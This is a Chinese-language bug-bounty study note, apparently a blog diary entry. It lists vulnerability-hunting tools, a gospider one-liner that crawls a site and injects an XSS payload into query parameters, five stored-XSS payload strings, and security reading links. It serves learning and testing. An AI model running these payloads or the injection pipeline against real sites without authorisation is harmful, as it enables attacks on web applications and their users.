一、漏洞挖掘工具
1.JSFScan.sh JS安全扫描攻击
https://github.com/KathanP19/JSFScan.sh
2.资产发现和管理工具,研究一下这个收费网站
https://bounty.offensiveai.com/about
3. 实时HTTP入侵检测
https://github.com/kitabisa/teler
二、挖掘技巧
1.寻找XSS
gospider -a -s https://site.com -t 3 -c 100 | tr ” ” “\n” | grep -v “.js” | grep “https://” | grep “=” | qsreplace ‘%22><svg%20onload=confirm(1);>’
2.寻找存储XSS
- 1. <img src=`xx:xx`onerror=alert(1)>
- 2. <div/onmouseover=’alert(1)’> style=”x:”>
- 3. \”;alert(‘XSS’);//
- 4. “autofocus/onfocus=alert(1)//
- 5. ‘-alert(1)-‘
3.XSS挑战
三、学习资料
1.办公软件安全 包括PDF,office
Leaky images and other foibles of office documents
2.Recon Like A Boss
3.聊天APP中的链接安全
https://thehackernews.com/2020/10/mobile-messaging-apps.html
4.macOS安全入门
https://theevilbit.github.io/posts/getting_started_in_macos_security/
5..Flare-On 7 Challenge Solutions
https://www.fireeye.com/blog/threat-research/2020/10/flare-on-7-challenge-solutions.html
加油啊,100天计划还没有完成呦
赞赞
好的哈,后面50天都会是挖到的漏洞分析
赞赞